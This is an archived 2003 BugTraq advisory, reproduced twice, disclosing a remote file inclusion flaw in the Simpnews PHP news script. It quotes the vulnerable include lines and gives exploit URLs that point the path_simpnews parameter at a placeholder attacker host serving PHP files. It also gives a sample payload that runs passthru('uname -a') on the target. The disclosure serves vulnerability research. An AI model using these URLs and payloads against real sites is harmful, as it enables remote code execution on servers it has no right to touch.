BugTraq
Back to list
|
Post reply
Simpnews include file Vulnerability
Jul 19 2003 08:25AM
pupet cahyo (pupet cosmo com)
original File name : PUPET-simpnews.txt
date releases : july 15, 2003
Informations :
=========================
Advisory Name: Simpnews include file Vulnerability
Author: PUPET <pupet (at) cosmo (dot) com [email concealed]>
Discover by: PUPET <pupet (at) cosmo (dot) com [email concealed]>
Website vendor : http://www.boesch-it.de/
Versions : tested on V2.01 -> V2.13
Problem : Include file
PHP Code/Location :
=========================
/eventscroller.php :
---------------------------
...
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
if(!isset($category))
$category=0;
if(!isset($lang) || !$lang)
...
--------------------------
/eventcal2.php :
---------------------------
...
if(!isset($lastvisitdate))
$lastvisitdate=0;
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
include_once($path_simpnews.'/includes/has_entries.inc');
...
---------------------------
Exploits :
===============
http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php
http://[attacker]/includes/has_entries.inc
or
http://[target]/eventscroller.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php
Example for config.php on http://[attacker]/
==================
<? passthru("uname -a"); ?>
Vendor Response:
==============
Not contacted yet
Patch :
=============
will post soon at http://www.cracxer.or.id .
reference :
=============
http://www.pupet.net/cracxerfiles
==============
This bugs Discover by : PUPET members of cracxer.or.id sub-devision
security focus (www.cracxer.or.id)
Thanks to :
============
kaka-joe , pak-tani, Bewok , AxAL , ^BuBuR^aYaM^ , Ernesto_che_guevarra ,
Babah, Idon
Schatje , juventini , Headup , Quervo , kecap , notts , Kemo (candyman)
and all crew #cracxer, #dhegleng, #minangcrew, #indocracker at @dalnet
By :
============
PUPET (no more mr nice guy)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
original File name : PUPET-simpnews.txt
date releases : july 15, 2003
Informations :
=========================
Advisory Name: Simpnews include file Vulnerability
Author: PUPET <pupet (at) cosmo (dot) com [email concealed]>
Discover by: PUPET <pupet (at) cosmo (dot) com [email concealed]>
Website vendor : http://www.boesch-it.de/
Versions : tested on V2.01 -> V2.13
Problem : Include file
PHP Code/Location :
=========================
/eventscroller.php :
---------------------------
...
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
if(!isset($category))
$category=0;
if(!isset($lang) || !$lang)
...
--------------------------
/eventcal2.php :
---------------------------
...
if(!isset($lastvisitdate))
$lastvisitdate=0;
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
include_once($path_simpnews.'/includes/has_entries.inc');
...
---------------------------
Exploits :
===============
http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php
http://[attacker]/includes/has_entries.inc
or
http://[target]/eventscroller.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php
Example for config.php on http://[attacker]/
==================
<? passthru("uname -a"); ?>
Vendor Response:
==============
Not contacted yet
Patch :
=============
will post soon at http://www.cracxer.or.id .
reference :
=============
http://www.pupet.net/cracxerfiles
==============
This bugs Discover by : PUPET members of cracxer.or.id sub-devision
security focus (www.cracxer.or.id)
Thanks to :
============
kaka-joe , pak-tani, Bewok , AxAL , ^BuBuR^aYaM^ , Ernesto_che_guevarra ,
Babah, Idon
Schatje , juventini , Headup , Quervo , kecap , notts , Kemo (candyman)
and all crew #cracxer, #dhegleng, #minangcrew, #indocracker at @dalnet
By :
============
PUPET (no more mr nice guy)
[ reply ]